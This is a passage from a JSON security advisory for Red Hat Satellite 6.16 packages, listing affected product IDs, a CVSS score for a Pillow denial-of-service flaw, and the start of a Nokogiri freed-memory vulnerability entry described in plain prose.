"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "python-pillow: Pillow: Denial of Service via crafted GD 2.x image file"
},
{
"cve": "CVE-2026-57236",
"cwe": {
"id": "CWE-825",
"name": "Expired Pointer Dereference"
},
"discovery_date": "2026-06-25T15:02:37.352778+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2492952"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Nokogiri, an XML and HTML library for Ruby. When an attacker provides an invalid encoding to the Document#encoding= function, the library frees the document\u0027s current encoding string without replacing it. This leaves the document referencing freed memory, which can lead to a denial of service (DoS) due to a segmentation fault or information disclosure by leaking freed memory into a Ruby String.",
"title": "Vulnerability description"
},
{
"category": "summary",
